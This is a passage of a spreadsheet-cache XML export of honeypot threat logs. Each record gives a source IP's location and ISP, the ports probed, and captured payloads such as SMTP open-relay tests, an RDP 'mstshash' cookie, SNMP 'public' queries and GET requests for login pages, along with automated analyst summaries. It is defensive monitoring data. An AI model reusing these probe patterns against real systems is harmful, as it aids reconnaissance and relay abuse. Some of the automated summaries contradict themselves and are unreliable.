    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="CA"/>
    <s v="California"/>
    <s v="Los Angeles"/>
    <s v="Los Angeles"/>
    <s v="5368361"/>
    <s v="90009"/>
    <s v="34.0549"/>
    <s v="-118.243"/>
    <s v="214943"/>
    <s v="Railnet LLC"/>
    <s v="HostPapa"/>
    <s v="hosting"/>
    <s v="Virtualine Technologies"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_SMTP:NA}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'RSET', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'from:&lt;spameri@tiscali.it&gt;', 'command': 'MAIL', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'to:&lt;spameri@tiscali.it&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'DATA', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000d__x000a_Subject:', 'command': 'FROM:', 'data': '103.211.202.140_x000d__x000a_To: spameri@tiscali.it_x000d__x000a_Date: Wed, 16 Apr 2025 10:09:30 -0700_x000d__x000a_X-Priority: 3_x000d__x000a_X-Library: Indy 8.0.25_x000d__x000a__x000d__x000a_t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'QUIT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'LOGIN', 'command': 'AUTH', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'TO:&lt;mrpeterjohn003@hotmail.com&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:423f:bbc9"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low&amp;&amp;Medium&amp;&amp;High"/>
    <s v="The attacker is attempting to gather information about the system and services available, likely for reconnaissance purposes. They are probing various protocols and ports to identify potential vulnerabilities and entry points. &amp;&amp; The attackers are scanning and probing the network for vulnerable services, attempting to gain unauthorized access through various protocols such as DHCP, DNS, FTP, HTTP, HTTPS, IMAP, IPP, IRC, LDAP, MSSQL, MYSQL, NTP, Oracle, PJL, POP3, RDP, REDIS, SIP, SMB, SMTP, SNMP. &amp;&amp; There is insufficient data to analyze. _x000a_The provided log data does not contain any information about potential malicious activity._x000a_It appears that there are no records of attempts or connections to the monitored services."/>
    <s v=" Phishing Attack &amp;&amp;  "/>
  </r>
  <r>
    <x v="723"/>
    <x v="723"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-26T20:21:29"/>
    <d v="2024-05-28T15:06:50"/>
    <d v="2025-04-26T20:21:29"/>
    <n v="89"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H28&amp;&amp;SMA-LAB_MSSQL_H2&amp;&amp;SMA-LAB_MSSQL_HC1"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;48779&amp;&amp;1433&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="VN"/>
    <s v="Vietnam"/>
    <s v="HN"/>
    <s v="Hanoi"/>
    <s v="Cầu Giấy District"/>
    <s v="Cầu Giấy"/>
    <s v="8616113"/>
    <s v="NA"/>
    <s v="21.0469"/>
    <s v="105.8"/>
    <s v="24173"/>
    <s v="Netnam Company"/>
    <s v="Netnam Corporation"/>
    <s v="business"/>
    <s v="NETNAM"/>
    <s v="2007-12-07"/>
    <s v="NETNAM-VN"/>
    <s v="None"/>
    <s v="query&amp;&amp;connection&amp;&amp;login&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_DHCP:{'53': 'x08', '55': 'x01x02x03x04x05x06x07x08_x0009__x000a_x0bx0c_x000d_x0ex0fx10x11x12x13x14x15x16x17x18x19x1ax1bx1cx1dx1ex1f !&amp;&amp;{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7711:de5c"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <s v="No SQL injection attempt detected, but possible malicious activity is related to database service access. _x000a_The attacker seems to be probing for potential vulnerabilities or testing service availability. No actual SQL query was issued."/>
    <m/>
  </r>
  <r>
    <x v="724"/>
    <x v="724"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-26T20:16:58"/>
    <d v="2025-04-16T03:23:50"/>
    <d v="2025-04-26T20:16:58"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_HTTPS_H36&amp;&amp;SMA-LAB_HTTPS_HC1"/>
    <s v="443&amp;&amp;8443"/>
    <s v="True"/>
    <s v="{'zen.spamhaus.org': ['unknown']}"/>
    <n v="33"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="IT"/>
    <s v="Italy"/>
    <s v="25"/>
    <s v="Lombardy"/>
    <s v="Province of Brescia"/>
    <s v="Brescia"/>
    <s v="3181554"/>
    <s v="25100"/>
    <s v="45.5416"/>
    <s v="10.2118"/>
    <s v="3269"/>
    <s v="Telecom Italia S.p.A."/>
    <s v="INTERBUSINESS"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="2007-02-21"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;GET"/>
    <s v="{Data_HTTPS:{'Accept': 'text/plain,text/html', 'Host': '5.182.38.84', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_HTTPS:{'Accept': 'text/plain,text/html', 'Host': '103.211.202.140', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:4f39:3b35"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="A GET request was made to the root directory of a server, indicating potential reconnaissance activity. The request included an Accept header that suggests the attacker may be looking for a specific type of content. This could be a probe to gather information about the server's configuration and capabilities. &amp;&amp; The data suggests an incoming GET request from IP address 103.211.202.140, targeting the root directory of the server with potentially malicious intent to retrieve sensitive information or exploit vulnerabilities. The Accept header indicates the client can handle plain text and HTML responses. This may indicate a reconnaissance attempt or a probe for potential weaknesses in the server's configuration."/>
    <m/>
  </r>
  <r>
    <x v="725"/>
    <x v="725"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-26T19:52:49"/>
    <d v="2025-04-26T19:52:49"/>
    <d v="2025-04-26T19:52:49"/>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dd:77f8"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="726"/>
    <x v="726"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-26T19:44:33"/>
    <d v="2025-04-26T10:37:31"/>
    <d v="2025-04-26T19:44:33"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H13"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['unknown']}"/>
    <n v="73"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Bengaluru Urban"/>
    <s v="Bengaluru"/>
    <s v="1277333"/>
    <s v="560056"/>
    <s v="12.9716"/>
    <s v="77.5946"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="BSNL Internet"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="2007-08-01"/>
    <s v="BB-Multiplay"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75ce:8144"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="727"/>
    <x v="727"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-26T19:39:44"/>
    <d v="2025-04-26T19:39:44"/>
    <d v="2025-04-26T19:39:44"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="True"/>
    <s v="{'zen.spamhaus.org': ['unknown']}"/>
    <n v="33"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="HR"/>
    <s v="Haryana"/>
    <s v="Nuh"/>
    <s v="Chandīgarh"/>
    <s v="9915976"/>
    <s v="160017"/>
    <s v="30.7333"/>
    <s v="76.7794"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="BSNL Internet"/>
    <s v="consumer"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75ff:b29e"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="728"/>
    <x v="728"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-26T19:38:26"/>
    <d v="2025-04-26T19:38:26"/>
    <d v="2025-04-26T19:38:26"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Brute Force"/>
    <s v="high"/>
    <s v="SMA-LAB_corporatelogin_Login.NIPPONINDIAIM_HC1"/>
    <s v="443"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="GB"/>
    <s v="United Kingdom"/>
    <s v="ENG"/>
    <s v="England"/>
    <s v="Greater London"/>
    <s v="London"/>
    <s v="2643743"/>
    <s v="W1B"/>
    <s v="51.5072"/>
    <s v="-0.127586"/>
    <s v="5378"/>
    <s v="unspecified"/>
    <s v="Vodafone"/>
    <s v="corporate"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login"/>
    <s v="{HTTP_LOGIN:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:5369:92a6"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="High"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="729"/>
    <x v="729"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-26T19:33:22"/>
    <d v="2024-12-29T12:47:09"/>
    <d v="2025-04-26T19:33:22"/>
    <n v="50"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_MYSQL_HC1&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MYSQL_H13&amp;&amp;SMA-LAB_MSSQL_H13"/>
    <s v="3306&amp;&amp;1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Thane"/>
    <s v="Navi Mumbai (Reliance Corporate Park)"/>
    <s v="6619347"/>
    <s v="NA"/>
    <s v="19.136"/>
    <s v="73.0039"/>
    <s v="55836"/>
    <s v="Reliance Jio Infocomm Limited"/>
    <s v="Reliance Jio Infocomm Limited"/>
    <s v="cellular"/>
    <s v="Reliance Jio Infocomm Limited"/>
    <s v="2008-09-08"/>
    <s v="RELIANCEJIO-IN"/>
    <s v="None"/>
    <s v="login&amp;&amp;connection"/>
    <s v="NA&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:73f3:95b3"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="Potential malicious activity detected, possible attempt to access or exploit Microsoft SQL Server._x000a_Malicious actor may be trying to inject malicious code or gain unauthorized access to database._x000a_This could lead to data theft or disruption of service."/>
    <m/>
  </r>
  <r>
    <x v="730"/>
    <x v="730"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-26T19:17:30"/>
    <d v="2024-03-06T20:38:00"/>
    <d v="2025-04-26T19:17:30"/>
    <n v="24833"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_MT-CPA_H9&amp;&amp;SMA-LAB_RDP_H25&amp;&amp;SMA-LAB_RDP_H6&amp;&amp;SMA-LAB_RDP_H27&amp;&amp;SMA-LAB_RDP_H33&amp;&amp;SMA-LAB_RDP_H36&amp;&amp;SMA-LAB_RDP_H30&amp;&amp;SMA-LAB_RDP_H16&amp;&amp;SMA-LAB_MT-CPA_H35&amp;&amp;SMA-LAB_MYSQL_H6&amp;&amp;SMA-LAB_MYSQL_H16&amp;&amp;SMA-LAB_MYSQL_H33&amp;&amp;SMA-LAB_MYSQL_H25&amp;&amp;SMA-LAB_MYSQL_H36&amp;&amp;SMA-LAB_MYSQL_H27&amp;&amp;SMA-LAB_RDP_H35&amp;&amp;SMA-LAB_MYSQL_HC1&amp;&amp;SMA-LAB_MT-CPA_H27&amp;&amp;SMA-LAB_RDP_H31"/>
    <s v="32979&amp;&amp;3389&amp;&amp;40125&amp;&amp;3306&amp;&amp;50731&amp;&amp;52765&amp;&amp;5432&amp;&amp;46410&amp;&amp;44536&amp;&amp;52793&amp;&amp;5900&amp;&amp;50458&amp;&amp;59005&amp;&amp;53717"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']}"/>
    <n v="28"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="AE"/>
    <s v="United Arab Emirates"/>
    <s v="AZ"/>
    <s v="Abu Dhabi"/>
    <s v="Abu Dhabi"/>
    <s v="Abu Dhabi"/>
    <s v="292968"/>
    <s v="NA"/>
    <s v="24.4539"/>
    <s v="54.3773"/>
    <s v="5384"/>
    <s v="EMIRATES TELECOMMUNICATIONS GROUP COMPANY (ETISALAT GROUP) PJSC"/>
    <s v="EMIRATES TELECOMMUNICATIONS GROUP COMPANY (ETISALAT GROUP) PJSC"/>
    <s v="business"/>
    <s v="EMIRATES TELECOMMUNICATIONS GROUP COMPANY (ETISALAT GROUP) PJSC"/>
    <s v="2005-04-20"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="stshash&amp;&amp;connection&amp;&amp;NA&amp;&amp;login"/>
    <s v="NA&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=hello'}}&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_VNC:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:5660:c054"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <s v="Possible malicious activity is an attempt to access Remote Desktop service. This may indicate a brute force attack or unauthorized access attempt. No successful login was detected, as indicated by the NA status. &amp;&amp; A malicious actor is attempting to bypass authentication by modifying the Remote Desktop Protocol (RDP) hash cookie with a hardcoded value, indicating an attempt to access the system without proper authorization. This could be part of a larger attack to gain unauthorized access to sensitive systems or data. The modified hash cookie suggests an attempt to evade detection. &amp;&amp; Possible reconnaissance attempt to extract server information, potentially for future exploitation or password cracking. Malicious actor trying to gather information about the target system. Server hash likely being targeted."/>
    <s v="Port Scan"/>
  </r>
  <r>
    <x v="731"/>
    <x v="731"/>
    <s v="NA&amp;&amp;crawler007.deepfield.net"/>
    <x v="0"/>
    <d v="2025-04-26T19:10:23"/>
    <d v="2024-10-28T09:30:38"/>
    <d v="2025-04-26T19:10:23"/>
    <n v="155"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:mail']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_IRC_HC1&amp;&amp;SMA-LAB_REDIS_H11&amp;&amp;SMA-LAB_REDIS_H24&amp;&amp;SMA-LAB_HTTPS_H26&amp;&amp;SMA-LAB_MT-CPA_H4&amp;&amp;SMA-LAB_NTP_H39&amp;&amp;SMA-LAB_PJL_HC1"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;6667&amp;&amp;6379&amp;&amp;443&amp;&amp;38247&amp;&amp;NA&amp;&amp;123&amp;&amp;9100&amp;&amp;56166&amp;&amp;3389&amp;&amp;1080&amp;&amp;110&amp;&amp;5432&amp;&amp;1433&amp;&amp;161&amp;&amp;3306&amp;&amp;1521&amp;&amp;21587&amp;&amp;143&amp;&amp;21719&amp;&amp;23&amp;&amp;80"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="WI"/>
    <s v="Wisconsin"/>
    <s v="Wood"/>
    <s v="Port Edwards"/>
    <s v="5267769"/>
    <s v="54469"/>
    <s v="44.3426"/>
    <s v="-89.8597"/>
    <s v="396982"/>
    <s v="Google LLC"/>
    <s v="Internet Utilities NA LLC"/>
    <s v="hosting"/>
    <s v="CyberOneData LLC"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA&amp;&amp;query&amp;&amp;login&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_SOCKS5:NA}&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_PJL:{'command': '                    '}}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SNMP:NA}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1.1.1.0 1.3.6.1.2.1.1.5.0', 'version': '0'}}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.0', 'version': '1'}}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'User-Agent': Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler), 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '194.4.48.242', 'User-Agent': Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler), 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '194.4.48.242', 'User-Agent': Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler), 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '194.4.48.242', 'User-Agent': Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler), 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '194.4.48.242', 'User-Agent': Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler), 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '194.4.48.242', 'User-Agent': Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler), 'method': 'GET', 'uri': '/cgi-bin/login.cgi'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '194.4.48.242', 'User-Agent': Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler), 'method': 'GET', 'uri': '/login.htm'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '194.4.48.242', 'User-Agent': Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler), 'method': 'GET', 'uri': '/login.htm'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '194.4.48.242', 'User-Agent': Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler), 'method': 'GET', 'uri': '/login.html'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '194.4.48.242', 'User-Agent': Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler), 'method': 'GET', 'uri': '/login.html'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '194.4.48.242', 'User-Agent': Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler), 'method': 'GET', 'uri': '/login'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '194.4.48.242', 'User-Agent': Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler), 'method': 'GET', 'uri': '/doc/index.html'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '194.4.48.242', 'User-Agent': Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler), 'method': 'GET', 'uri': '/remote/login'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '194.4.48.242', 'User-Agent': Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler), 'method': 'GET', 'uri': '/remote/login'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '194.4.48.242', 'User-Agent': Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler), 'method': 'GET', 'uri': '//admin/login.asp'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '194.4.48.242', 'User-Agent': Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler), 'method': 'GET', 'uri': '/web/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '194.4.48.242', 'User-Agent': Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler), 'method': 'GET', 'uri': '/web/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '185.255.123.181', 'User-Agent': Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler), 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '185.234.67.80', 'User-Agent': Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler), 'method': 'GET', 'uri': '/index.html'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '185.234.67.80', 'User-Agent': Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler), 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '185.234.67.80', 'User-Agent': Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler), 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_IRC:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:68ea:7307"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="732"/>
    <x v="732"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-26T19:06:11"/>
    <d v="2025-04-26T19:06:11"/>
    <d v="2025-04-26T19:06:11"/>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rporate"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3b5b:60b8"/>
